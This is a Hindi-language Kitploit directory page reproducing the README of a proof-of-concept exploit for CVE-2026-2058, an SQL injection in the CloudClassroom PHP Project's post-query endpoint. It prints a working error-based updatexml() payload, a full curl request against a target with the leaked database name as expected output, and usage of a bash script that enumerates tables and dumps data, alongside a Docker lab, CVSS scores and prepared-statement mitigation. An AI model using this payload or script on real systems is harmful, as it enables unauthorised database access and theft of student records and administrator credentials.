Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-2058-PoC — CVE-2026-2058 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो CloudClassroom PHP Project में SQL इंजेक्शन है, जिसमें स्वचालित डेटाबेस एन्यूमरेशन और डेटा निष्कर्षण शामिल है। | Kitploit
उपकरण/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

CVE-2026-2058 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो CloudClassroom PHP Project में SQL इंजेक्शन है, जिसमें स्वचालित डेटाबेस एन्यूमरेशन और डेटा निष्कर्षण शामिल है।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-2058-PoC – CloudClassroom PHP प्रोजेक्ट SQL इंजेक्शन

अवलोकन

CloudClassroom PHP प्रोजेक्ट (v1.0) की पोस्ट क्वेरी कार्यक्षमता में एक SQL इंजेक्शन भेद्यता मौजूद है।

यह भेद्यता हमलावरों को squeryx POST पैरामीटर के माध्यम से मनमाने SQL कमांड इंजेक्ट करने की अनुमति देती है, जिससे डेटाबेस एन्यूमरेशन और डेटा निष्कर्षण संभव होता है।

इस रिपॉजिटरी में एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है जो दर्शाता है कि बैकएंड डेटाबेस से संवेदनशील डेटा निकालने के लिए भेद्यता का दुरुपयोग कैसे किया जा सकता है।


भेद्यता जानकारी

फ़ील्डमान
CVECVE-2026-2058
भेद्यता प्रकारSQL इंजेक्शन
CWECWE-89
प्रभावित सॉफ्टवेयरCloudClassroom PHP प्रोजेक्ट
प्रभावित संस्करण1.0
घटकपोस्ट क्वेरी कार्यक्षमता
हमला वेक्टररिमोट
प्रमाणीकरण आवश्यकनहीं
प्रभावडेटाबेस प्रकटीकरण
गंभीरताउच्च
हमला पैटर्न संदर्भCAPEC-66

भेद्य एंडपॉइंट

root@kitploit:~
POST /postquerypublic

भेद्य पैरामीटर

root@kitploit:~
squeryx

मूल कारण

बैकएंड कोड उचित सैनिटाइज़ेशन या पैरामीटराइज़्ड क्वेरी के बिना उपयोगकर्ता इनपुट को सीधे SQL क्वेरी में जोड़ता है।

भेद्य कोड का उदाहरण:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

चूंकि $tempsquery उपयोगकर्ता इनपुट से प्राप्त होता है, हमलावर मनमाना SQL इंजेक्ट कर सकते हैं।


भेद्य लैब सेटअप (Docker)

परीक्षण और शोध उद्देश्यों के लिए, एक भेद्य Docker वातावरण उपलब्ध है।

भेद्य एप्लिकेशन चलाएं

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

प्रूफ ऑफ कॉन्सेप्ट

MySQL के updatexml() फ़ंक्शन का उपयोग करके एरर-आधारित SQL इंजेक्शन तकनीक के माध्यम से भेद्यता को ट्रिगर किया जा सकता है।

पेलोड का उदाहरण:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

मैनुअल एक्सप्लॉइटेशन

curl अनुरोध का उदाहरण:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

अपेक्षित प्रतिक्रिया:

root@kitploit:~
XPATH syntax error: '~cc_db~'

एक्सप्लॉइट स्क्रिप्ट

इस रिपॉजिटरी में एक bash एक्सप्लॉइट शामिल है जो स्वचालित रूप से:

  • डेटाबेस का नाम निकालता है
  • टेबल्स की एन्यूमरेट करता है
  • कॉलम्स की एन्यूमरेट करता है
  • टेबल डेटा डंप करता है

उपयोग

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

उदाहरण:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

प्रभाव

एक हमलावर यह कर सकता है:

  • डेटाबेस संरचना की एन्यूमरेट करना
  • संवेदनशील डेटा निकालना
  • व्यवस्थापक क्रेडेंशियल प्राप्त करना
  • छात्र रिकॉर्ड तक पहुंचना
  • बैकएंड डेटाबेस से पूरी तरह समझौता करना

CVSS स्कोर

NIST NVD

  • बेस स्कोर: 9.8 (क्रिटिकल)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • बेस स्कोर: 7.3 (उच्च)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ नोट: विभिन्न प्रभाव आकलनों के कारण NVD CVSS स्कोर CNA (VulDB) स्कोर से भिन्न है।


EPSS (एक्सप्लॉइट प्रेडिक्शन स्कोरिंग सिस्टम)

एक्सप्लॉइट प्रेडिक्शन स्कोरिंग सिस्टम (EPSS) उस संभावना का अनुमान लगाता है कि किसी भेद्यता का वास्तविक दुनिया में शोषण किया जाएगा।

CVEEPSS संभावनाप्रतिशतकतिथि
CVE-2026-20580.000287.62 %2026-03-01

स्रोत: FIRST EPSS डेटासेट


शमन

डेवलपर्स को यह करना चाहिए:

  • प्रीपेयर्ड स्टेटमेंट्स का उपयोग करें
  • इनपुट सत्यापन लागू करें
  • उपयोगकर्ता इनपुट को उचित रूप से एस्केप करें
  • न्यूनतम विशेषाधिकार डेटाबेस अनुमतियाँ लागू करें

सुरक्षित कार्यान्वयन का उदाहरण:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

स्क्रीनशॉट

SQL इंजेक्शन एक्सप्लॉइटेशन

image

image

संदर्भ

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है।

लेखक इस कोड के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


लेखक

bl4dsc4n

सुरक्षा शोधकर्ता

टूल डाउनलोड करें